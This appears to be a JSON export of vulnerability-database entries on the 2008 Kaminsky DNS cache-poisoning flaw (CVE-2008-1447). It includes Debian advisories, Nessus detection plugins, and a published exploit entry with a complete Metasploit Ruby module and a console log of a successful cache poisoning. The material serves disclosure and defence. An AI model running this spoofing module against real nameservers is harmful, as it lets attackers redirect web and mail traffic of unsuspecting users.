http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0.orig.tar.gz\r\n Size/MD5 checksum: 21084 82d377c6a59181072b30b0da4e9835b8\r\n http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0-5.2+etch1.diff.gz\r\n Size/MD5 checksum: 3444 06a021e1cf9836cec4bbe72461bab137\r\n http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0-5.2+etch1.dsc\r\n Size/MD5 checksum: 695 c2e7178128b7033952b7795b358dea0b\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/p/python-dns/python-dns_2.3.0-5.2+etch1_all.deb\r\n Size/MD5 checksum: 22750 b544ce3edb7d2051811ec743a49206a1\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFIjEBMU5XKDemr/NIRAtOoAJ91jGx81nu4sscNxN4kh/sK6n+IAACgsw9F\r\ntkZYVyRx5dD7xQk0AKMYM4Q=\r\n=2uYK\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-07-29T00:00:00", "published": "2008-07-29T00:00:00", "id": "SECURITYVULNS:DOC:20231", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20231", "title": "[SECURITY] [DSA 1619-1] New python-dns packages fix DNS response spoofing", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:27", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "description": " ____ ____ __ __\r\n / \ / \ | | | |\r\n ----====####/ /\__\##/ /\ \##| |##| |####====----\r\n | | | |__| | | | | |\r\n | | ___ | __ | | | | |\r\n ------======######\ \/ /#| |##| |#| |##| |######======------\r\n \____/ |__| |__| \______/\r\n \r\n Computer Academic Underground\r\n http://www.caughq.org\r\n Exploit Code\r\n\r\n===============/========================================================\r\nExploit ID: CAU-EX-2008-0002\r\nRelease Date: 2008.07.23\r\nTitle: bailiwicked_host.rb\r\nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit\r\nTested: BIND 9.4.1-9.4.2\r\nAttributes: Remote, Poison, Resolver, Metasploit\r\nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt\r\nAuthor/Email: I)ruid <druid (@) caughq.org>\r\n H D Moore <hdm (@) metasploit.com>\r\n===============/========================================================\r\n\r\nDescription\r\n===========\r\n\r\nThis exploit targets a fairly ubiquitous flaw in DNS implementations\r\nwhich allow the insertion of malicious DNS records into the cache of the\r\ntarget nameserver. This exploit caches a single malicious host entry\r\ninto the target nameserver. By causing the target nameserver to query\r\nfor random hostnames at the target domain, the attacker can spoof a\r\nresponse to the target server including an answer for the query, an\r\nauthority server record, and an additional record for that server,\r\ncausing target nameserver to insert the additional record into the\r\ncache.\r\n\r\n\r\nExample\r\n=======\r\n\r\n# /msf3/msfconsole\r\n\r\n _ _ _ _\r\n | | | | (_) |\r\n _ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_\r\n| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|\r\n| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_\r\n|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|\r\n | |\r\n |_|\r\n\r\n\r\n =[ msf v3.2-release\r\n+ -- --=[ 298 exploits - 124 payloads\r\n+ -- --=[ 18 encoders - 6 nops\r\n =[ 72 aux\r\n\r\nmsf > use auxiliary/spoof/dns/bailiwicked_host\r\nmsf auxiliary(bailiwicked_host) > show options\r\n\r\nModule options:\r\n\r\n Name Current Setting Required Description\r\n ---- --------------- -------- -----------\r\n HOSTNAME pwned.example.com yes Hostname to hijack\r\n NEWADDR 1.3.3.7 yes New address for hostname\r\n RECONS 208.67.222.222 yes Nameserver used for reconnaissance\r\n RHOST yes The target address\r\n SRCPORT yes The target server's source query port (0 for automatic)\r\n XIDS 10 yes Number of XIDs to try for each query\r\n\r\nmsf auxiliary(bailiwicked_host) > set RHOST A.B.C.D\r\nRHOST => A.B.C.D\r\n\r\nmsf auxiliary(bailiwicked_host) > check\r\n[*] Using the Metasploit service to verify exploitability...\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] >> ADDRESS: A.B.C.D PORT: 48178\r\n[*] FAIL: This server uses static source ports and is vulnerable to poisoning\r\n\r\nmsf auxiliary(bailiwicked_host) > set SRCPORT 0\r\nSRCPORT => 0\r\n\r\nmsf auxiliary(bailiwicked_host) > run\r\n[*] Switching to target port 48178 based on Metasploit service\r\n[*] Targeting nameserver A.B.C.D\r\n[*] Querying recon nameserver for example.com.'s nameservers...\r\n[*] Got answer with 2 answers, 0 authorities\r\n[*] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com.\r\n[*] Querying recon nameserver for address of ns89.worldnic.com....\r\n[*] Got answer with 1 answers, 0 authorities\r\n[*] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45\r\n[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com....\r\n[*] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com.\r\n[*] Querying recon nameserver for address of ns90.worldnic.com....\r\n[*] Got answer with 1 answers, 0 authorities\r\n[*] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45\r\n[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com....\r\n[*] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as\r\n[*] Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178...\r\n[*] Sent 1000 queries and 20000 spoofed responses...\r\n[*] Sent 2000 queries and 40000 spoofed responses...\r\n[*] Sent 3000 queries and 60000 spoofed responses...\r\n[*] Sent 4000 queries and 80000 spoofed responses...\r\n[*] Sent 5000 queries and 100000 spoofed responses...\r\n[*] Sent 6000 queries and 120000 spoofed responses...\r\n[*] Sent 7000 queries and 140000 spoofed responses...\r\n[*] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7\r\n[*] Auxiliary module execution completed\r\nmsf auxiliary(bailiwicked_host) > \r\n\r\nmsf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D\r\n[*] exec: nslookup pwned.example.com A.B.C.D\r\n\r\nServer: A.B.C.D\r\nAddress: A.B.C.D#53\r\n\r\nNon-authoritative answer:\r\nName: pwned.example.com\r\nAddress: 1.3.3.7\r\n\r\n\r\nCredits\r\n=======\r\n\r\nDan Kaminsky is credited with originally discovering this vulnerability.\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\r\nhttp://www.kb.cert.org/vuls/id/800113\r\n\r\n\r\nMetasploit\r\n==========\r\n\r\nrequire 'msf/core'\r\nrequire 'net/dns'\r\nrequire 'scruby'\r\nrequire 'resolv'\r\n\r\nmodule Msf\r\n\r\nclass Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary\r\n\r\n include Exploit::Remote::Ip\r\n\r\n def initialize(info = {})\r\n super(update_info(info, \r\n 'Name' => 'DNS BailiWicked Host Attack',\r\n 'Description' => %q{\r\n This exploit attacks a fairly ubiquitous flaw in DNS implementations\r\nwhich \r\n Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a\r\nsingle\r\n malicious host entry into the target nameserver by sending random\r\nsub-domain\r\n queries to the target DNS server coupled with spoofed replies to those\r\n queries from the authoritative nameservers for the domain which\r\ncontain a\r\n malicious host entry for the hostname to be poisoned in the authority\r\nand\r\n additional records sections. Eventually, a guessed ID will match and\r\nthe\r\n spoofed packet will get accepted, and due to the additional hostname\r\nentry\r\n being within bailiwick constraints of the original request the\r\nmalicious host\r\n entry will get cached.\r\n },\r\n 'Author' => [ 'I)ruid', 'hdm' ],\r\n 'License' => MSF_LICENSE,\r\n 'Version' => '$Revision: 5585 $',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2008-1447' ],\r\n [ 'US-CERT-VU', '8000113' ],\r\n [ 'URL',\r\n'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ],\r\n ],\r\n 'Privileged' => true,\r\n 'Targets' => \r\n [\r\n ["BIND", \r\n {\r\n 'Arch' => ARCH_X86,\r\n 'Platform' => 'linux',\r\n },\r\n ],\r\n ],\r\n 'DisclosureDate' => 'Jul 21 2008'\r\n ))\r\n \r\n register_options(\r\n [\r\n OptPort.new('SRCPORT', [true, "The target server's source\r\nquery port (0 for automatic)", nil]),\r\n OptString.new('HOSTNAME', [true, 'Hostname to hijack',\r\n'pwned.example.com']),\r\n OptAddress.new('NEWADDR', [true, 'New address for hostname',\r\n'1.3.3.7']),\r\n OptAddress.new('RECONS', [true, 'Nameserver used for\r\nreconnaissance', '208.67.222.222']),\r\n OptInt.new('XIDS', [true, 'Number of XIDs to try for each\r\nquery', 10]),\r\n OptInt.new('TTL', [true, 'TTL for the malicious host entry',\r\n31337]),\r\n ], self.class)\r\n \r\n end\r\n \r\n def auxiliary_commands\r\n return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }\r\n end\r\n\r\n def cmd_check(*args)\r\n targ = args[0] || rhost()\r\n if(not (targ and targ.length > 0))\r\n print_status("usage: check [dns-server]")\r\n return\r\n end\r\n\r\n print_status("Using the Metasploit service to verify exploitability...")\r\n srv_sock = Rex::Socket.create_udp(\r\n 'PeerHost' => targ,\r\n 'PeerPort' => 53\r\n ) \r\n\r\n random = false\r\n ports = []\r\n lport = nil\r\n \r\n 1.upto(5) do |i|\r\n \r\n req = Resolv::DNS::Message.new\r\n txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"\r\n req.add_question(txt, Resolv::DNS::Resource::IN::TXT)\r\n req.rd = 1\r\n \r\n srv_sock.put(req.encode)\r\n res, addr = srv_sock.recvfrom()\r\n \r\n\r\n if res and res.length > 0\r\n res = Resolv::DNS::Message.decode(res)\r\n res.each_answer do |name, ttl, data|\r\n if (name.to_s == txt and data.strings.join('') =~\r\n/^([^\s]+)\s+.*red\.metasploit\.com/m)\r\n t_addr, t_port = $1.split(':')\r\n\r\n print_status(" >> ADDRESS: #{t_addr} PORT:\r\n#{t_port}")\r\n t_port = t_port.to_i\r\n if(lport and lport != t_port)\r\n random = true\r\n end\r\n lport = t_port\r\n ports << t_port\r\n end\r\n end\r\n end \r\n end\r\n \r\n srv_sock.close\r\n \r\n if(ports.length < 5)\r\n print_status("UNKNOWN: This server did not reply to our vulnerability check\r\nrequests")\r\n return\r\n end\r\n \r\n if(random)\r\n print_status("PASS: This server does not use a static source port. Ports:\r\n#{ports.join(", ")}")\r\n print_status(" This server may still be exploitable, but not by this\r\ntool.")\r\n else\r\n print_status("FAIL: This server uses static source ports and is vulnerable to\r\npoisoning")\r\n end\r\n end\r\n \r\n def run\r\n target = rhost()\r\n source = Rex::Socket.source_address(target)\r\n sport = datastore['SRCPORT']\r\n hostname = datastore['HOSTNAME'] + '.'\r\n address = datastore['NEWADDR']\r\n recons = datastore['RECONS']\r\n xids = datastore['XIDS'].to_i\r\n ttl = datastore['TTL'].to_i\r\n xidbase = rand(4)+2*10000\r\n\r\n domain = hostname.match(/[^\x2e]+\x2e[^\x2e]+\x2e$/)[0]\r\n\r\n srv_sock = Rex::Socket.create_udp(\r\n 'PeerHost' => target,\r\n 'PeerPort' => 53\r\n )\r\n\r\n # Get the source port via the metasploit service if it's not set\r\n if sport.to_i == 0\r\n req = Resolv::DNS::Message.new\r\n txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"\r\n req.add_question(txt, Resolv::DNS::Resource::IN::TXT)\r\n req.rd = 1\r\n \r\n srv_sock.put(req.encode)\r\n res, addr = srv_sock.recvfrom()\r\n \r\n if res and res.length > 0\r\n res = Resolv::DNS::Message.decode(res)\r\n res.each_answer do |name, ttl, data|\r\n if (name.to_s == txt and data.strings.join('') =~\r\n/^([^\s]+)\s+.*red\.metasploit\.com/m)\r\n t_addr, t_port = $1.split(':')\r\n sport = t_port.to_i\r\n\r\n print_status("Switching to target port #{sport} based\r\non Metasploit service")\r\n if target != t_addr\r\n print_status("Warning: target address\r\n#{target} is not the same as the nameserver's query source address #{t_addr}!")\r\n end\r\n end\r\n end\r\n end\r\n end\r\n\r\n # Verify its not already cached\r\n begin\r\n query = Resolv::DNS::Message.new\r\n query.add_question(hostname, Resolv::DNS::Resource::IN::A)\r\n query.rd = 0\r\n\r\n begin\r\n cached = false\r\n srv_sock.put(query.encode)\r\n answer, addr = srv_sock.recvfrom()\r\n\r\n if answer and answer.length > 0\r\n answer = Resolv::DNS::Message.decode(answer)\r\n answer.each_answer do |name, ttl, data|\r\n if((name.to_s + ".") == hostname and\r\ndata.address.to_s == address)\r\n t = Time.now + ttl\r\n print_status("Failure: This hostname is\r\nalready in the target cache: #{name} == #{address}")\r\n print_status(" Cache entry expires on\r\n#{t.to_s}... sleeping.")\r\n cached = true\r\n sleep ttl\r\n end\r\n end\r\n end\r\n end until not cached\r\n rescue ::Interrupt\r\n raise $!\r\n rescue ::Exception => e\r\n print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")\r\n end\r\n\r\n res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false,\r\n:recursive => true) # reconnaissance resolver\r\n\r\n print_status "Targeting nameserver #{target} for injection of #{hostname} as\r\n#{address}"\r\n\r\n # Look up the nameservers for the domain\r\n print_status "Querying recon nameserver for #{domain}'s nameservers..."\r\n answer0 = res0.send(domain, Net::DNS::NS)\r\n #print_status " Got answer with #{answer0.header.anCount} answers,\r\n#{answer0.header.nsCount} authorities"\r\n\r\n barbs = [] # storage for nameservers\r\n answer0.answer.each do |rr0|\r\n print_status " Got an #{rr0.type} record: #{rr0.inspect}"\r\n if rr0.type == 'NS'\r\n print_status " Querying recon nameserver for address of\r\n#{rr0.nsdname}..."\r\n answer1 = res0.send(rr0.nsdname) # get the ns's answer for the\r\nhostname\r\n #print_status " Got answer with #{answer1.header.anCount} answers,\r\n#{answer1.header.nsCount} authorities"\r\n answer1.answer.each do |rr1|\r\n print_status " Got an #{rr1.type} record: #{rr1.inspect}"\r\n res2 = Net::DNS::Resolver.new(:nameservers => rr1.address,\r\n:dns_search => false, :recursive => false, :retry => 1) \r\n print_status " Checking Authoritativeness: Querying\r\n#{rr1.address} for #{domain}..."\r\n answer2 = res2.send(domain)\r\n if answer2 and answer2.header.auth? and\r\nanswer2.header.anCount >= 1\r\n nsrec = {:name => rr0.nsdname, :addr => rr1.address}\r\n barbs << nsrec\r\n print_status " #{rr0.nsdname} is authoritative for\r\n#{domain}, adding to list of nameservers to spoof as"\r\n end\r\n end\r\n end \r\n end\r\n\r\n if barbs.length == 0\r\n print_status( "No DNS servers found.")\r\n srv_sock.close\r\n disconnect_ip\r\n return\r\n end\r\n\r\n # Flood the target with queries and spoofed responses, one will eventually hit\r\n queries = 0\r\n responses = 0\r\n\r\n connect_ip if not ip_sock\r\n\r\n print_status( "Attempting to inject a poison record for #{hostname} into\r\n#{target}:#{sport}...")\r\n\r\n while true\r\n randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize\r\nthe hostname\r\n\r\n # Send spoofed query\r\n req = Resolv::DNS::Message.new\r\n req.id = rand(2**16)\r\n req.add_question(randhost, Resolv::DNS::Resource::IN::A)\r\n\r\n req.rd = 1\r\n\r\n buff = (\r\n Scruby::IP.new(\r\n #:src => barbs[0][:addr].to_s,\r\n :src => source,\r\n :dst => target,\r\n :proto => 17\r\n )/Scruby::UDP.new(\r\n :sport => (rand((2**16)-1024)+1024).to_i,\r\n :dport => 53\r\n )/req.encode\r\n ).to_net\r\n ip_sock.sendto(buff, target)\r\n queries += 1\r\n \r\n # Send evil spoofed answer from ALL nameservers (barbs[*][:addr])\r\n req.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address))\r\n req.add_authority(domain, ttl,\r\nResolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname)))\r\n req.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address))\r\n req.qr = 1\r\n req.ra = 1\r\n\r\n xidbase.upto(xidbase+xids-1) do |id|\r\n req.id = id\r\n barbs.each do |barb|\r\n buff = (\r\n Scruby::IP.new(\r\n #:src => barbs[i][:addr].to_s,\r\n :src => barb[:addr].to_s,\r\n :dst => target,\r\n :proto => 17\r\n )/Scruby::UDP.new(\r\n :sport => 53,\r\n :dport => sport.to_i\r\n )/req.encode\r\n ).to_net\r\n ip_sock.sendto(buff, target)\r\n responses += 1\r\n end\r\n end\r\n\r\n # status update\r\n if queries % 1000 == 0\r\n print_status("Sent #{queries} queries and #{responses} spoofed\r\nresponses...")\r\n end\r\n\r\n # every so often, check and see if the target is poisoned...\r\n if queries % 250 == 0 \r\n begin\r\n query = Resolv::DNS::Message.new\r\n query.add_question(hostname, Resolv::DNS::Resource::IN::A)\r\n query.rd = 0\r\n \r\n srv_sock.put(query.encode)\r\n answer, addr = srv_sock.recvfrom()\r\n\r\n if answer and answer.length > 0\r\n answer = Resolv::DNS::Message.decode(answer)\r\n answer.each_answer do |name, ttl, data|\r\n if((name.to_s + ".") == hostname and\r\ndata.address.to_s == address)\r\n print_status("Poisoning successful\r\nafter #{queries} attempts: #{name} == #{address}")\r\n disconnect_ip\r\n return\r\n end\r\n end\r\n end\r\n rescue ::Interrupt\r\n raise $!\r\n rescue ::Exception => e\r\n print_status("Error querying the DNS name: #{e.class} #{e}\r\n#{e.backtrace}")\r\n end\r\n end\r\n\r\n end\r\n\r\n end\r\n\r\nend\r\nend\r\n\r\n\r\n-- \r\nI)ruid, C²ISSP\r\ndruid@caughq.org\r\nhttp://druid.caughq.org", "edition": 1, "modified": "2008-07-25T00:00:00", "published": "2008-07-25T00:00:00", "id": "SECURITYVULNS:DOC:20222", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20222", "title": "CAU-EX-2008-0002: Kaminsky DNS Cache Poisoning Flaw Exploit", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "cvelist": ["CVE-2008-1447"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1605-1 security@debian.org\r\nhttp://www.debian.org/security/ Florian Weimer\r\nJuly 08, 2008 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : glibc\r\nVulnerability : DNS cache poisoning\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2008-1447\r\nCERT advisory : VU#800113\r\n\r\n\r\nDan Kaminsky discovered that properties inherent to the DNS protocol\r\nlead to practical DNS spoofing and cache poisoning attacks. Among\r\nother things, successful attacks can lead to misdirected web traffic\r\nand email rerouting.\r\n\r\nAt this time, it is not possible to implement the recommended\r\ncountermeasures in the GNU libc stub resolver. The following\r\nworkarounds are available:\r\n\r\n1. Install a local BIND 9 resoler on the host, possibly in\r\nforward-only mode. BIND 9 will then use source port randomization\r\nwhen sending queries over the network. (Other caching resolvers can\r\nbe used instead.)\r\n\r\n2. Rely on IP address spoofing protection if available. Successful\r\nattacks must spoof the address of one of the resolvers, which may not\r\nbe possible if the network is guarded properly against IP spoofing\r\nattacks (both from internal and external sources).\r\n\r\nThis DSA will be updated when patches for hardening the stub resolver\r\nare available.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.6 (GNU/Linux)\r\n\r\niQEVAwUBSHOIFr97/wQC1SS+AQIscwf+KBKMT4hcpB5TCNE+0v1DNBHiQ4rh7ktz\r\nKiOyLWEJOaxOrpsR8siA6B6newiLe5KfwojDikqSCXbubTCeicj79HTCx5DzzhTm\r\naa3HePARxmtN1AuyFCebOfklibTtyY/gpwydCdAVBiV0+LmD+jXy9Jx4AfyuibXZ\r\nVaqkUTj5sUUQn5CacdI1zc1Ky1rzbzRBBoNJ1D1rRBU1wjoGsvVjBV9p24j/1E2c\r\nmYtbY3g1FKmhnOTLBac/AAW62ZQ44yf4QcGgwV8CULfi5c2QmGiRYZioWDVd0pfZ\r\nhr2h/Vmjs2qgf8B9FmYet0hEGm6SrEryT2ievlqXkpul0MYtHjJ5iw==\r\n=CMHb\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-07-12T00:00:00", "published": "2008-07-12T00:00:00", "id": "SECURITYVULNS:DOC:20145", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20145", "title": "[SECURITY] [DSA 1605-1] DNS vulnerability impact on the libc stub resolver", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2021-01-07T10:52:24", "description": "The remote host is affected by the vulnerability described in GLSA-200809-02\n(dnsmasq: Denial of Service and DNS spoofing)\n\n Dan Kaminsky of IOActive reported that dnsmasq does not randomize UDP\n source ports when forwarding DNS queries to a recursing DNS server\n (CVE-2008-1447).\n Carlos Carvalho reported that dnsmasq in the 2.43 version does not\n properly handle clients sending inform or renewal queries for unknown\n DHCP leases, leading to a crash (CVE-2008-3350).\n \nImpact :\n\n A remote attacker could send spoofed DNS response traffic to dnsmasq,\n possibly involving generating queries via multiple vectors, and spoof\n DNS replies, which could e.g. lead to the redirection of web or mail\n traffic to malicious sites. Furthermore, an attacker could generate\n invalid DHCP traffic and cause a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 26, "published": "2008-09-05T00:00:00", "title": "GLSA-200809-02 : dnsmasq: Denial of Service and DNS spoofing", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447", "CVE-2008-3350"], "modified": "2008-09-05T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:dnsmasq"], "id": "GENTOO_GLSA-200809-02.NASL", "href": "https://www.tenable.com/plugins/nessus/34091", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200809-02.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34091);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-1447\", \"CVE-2008-3350\");\n script_xref(name:\"GLSA\", value:\"200809-02\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"GLSA-200809-02 : dnsmasq: Denial of Service and DNS spoofing\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200809-02\n(dnsmasq: Denial of Service and DNS spoofing)\n\n Dan Kaminsky of IOActive reported that dnsmasq does not randomize UDP\n source ports when forwarding DNS queries to a recursing DNS server\n (CVE-2008-1447).\n Carlos Carvalho reported that dnsmasq in the 2.43 version does not\n properly handle clients sending inform or renewal queries for unknown\n DHCP leases, leading to a crash (CVE-2008-3350).\n \nImpact :\n\n A remote attacker could send spoofed DNS response traffic to dnsmasq,\n possibly involving generating queries via multiple vectors, and spoof\n DNS replies, which could e.g. lead to the redirection of web or mail\n traffic to malicious sites. Furthermore, an attacker could generate\n invalid DHCP traffic and cause a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200809-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All dnsmasq users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-dns/dnsmasq-2.45'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:dnsmasq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/05\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-dns/dnsmasq\", unaffected:make_list(\"ge 2.45\"), vulnerable:make_list(\"lt 2.45\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dnsmasq\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-02-01T02:03:29", "description": "The remote host is running dnsmasq, a DHCP and DNS server.\n\nThe version of dnsmasq installed on the remote host reports itself as\n2.43. This version reportedly is affected by 3 denial of service\nissues :\n\n - The application can crash when an unknown client\n attempts to renew a DHCP lease.\n\n - The application may crash when a host which doesn't\n have a lease does a 'DHCPINFORM'.\n\n - There is a crash vulnerability in the netlink code.", "edition": 26, "cvss3": {"score": 5.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}, "published": "2008-09-08T00:00:00", "title": "dnsmasq < 2.45 Multiple Remote DoS", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3350"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:thekelleys:dnsmasq"], "id": "DNSMASQ_MULTIPLE_DOS.NASL", "href": "https://www.tenable.com/plugins/nessus/34111", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34111);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2018/07/10 14:27:31\");\n\n script_cve_id(\"CVE-2008-3350\");\n script_bugtraq_id(31017);\n\n script_name(english:\"dnsmasq < 2.45 Multiple Remote DoS\");\n script_summary(english:\"Checks the version of dnsmasq\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote DNS / DHCP service is affected by multiple denial of\nservice vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running dnsmasq, a DHCP and DNS server.\n\nThe version of dnsmasq installed on the remote host reports itself as\n2.43. This version reportedly is affected by 3 denial of service\nissues :\n\n - The application can crash when an unknown client\n attempts to renew a DHCP lease.\n\n - The application may crash when a host which doesn't\n have a lease does a 'DHCPINFORM'.\n\n - There is a crash vulnerability in the netlink code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.thekelleys.org.uk/dnsmasq/CHANGELOG\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e8cca54d\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5db6c7d4\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to dnsmasq 2.45 or later.\");\n 